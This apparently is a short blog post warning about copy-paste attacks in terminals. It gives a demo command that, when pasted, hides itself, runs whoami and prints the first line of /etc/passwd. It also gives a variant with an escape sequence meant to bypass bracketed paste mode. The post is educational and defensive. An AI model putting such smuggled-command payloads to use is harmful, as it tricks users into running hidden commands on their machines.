You surely know this: You're looking at some website with some useful shell commands. However, those commands are long as hell and you know you're probably not gonna need them for a few years or so (so there's no need to memorize them). So, what do you do? You copy-paste them. Here's an example:

git clone /dev/null; clear; echo -n "Hello ";whoami|tr -d '

';echo -e '!

That was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!

Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd

git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

Try running this command in your terminal. It's supposed to be harmless, right? It is harmless, yes, but what happens still isn't what you'd expect and demonstrates the dangers in doing stuff like that. Mark it with your mouse, copy it somehow (e.g. using CTRL+C) and paste it into a terminal. What happens?

There are some good comments and suggestions on how you can mitigate this kind of attack on reddit and Hacker News. Also, oh-my-zsh now includes a fix for this issue (which relies on Bracketed Paste Mode support in the terminal). Oh, and it seems that other people wrote a detailed text about this issue in 2008.

Please note that Bracketed Paste Mode DOES NOT always fix this because the end sequence can be inside the text you paste unless your terminal emulator filters out the bracketed paste characters when pasting! For those of you who have installed the oh-my-zsh stuff, the following variant (which includes an escape sequence) might still work against you:

git clone [201~/dev/null; clear; echo -n "Hello ";whoami|tr -d '

';echo -e '!

That was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!

Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd

git clone git://git.kernel.org/pub/scm/utils/kup/kup.git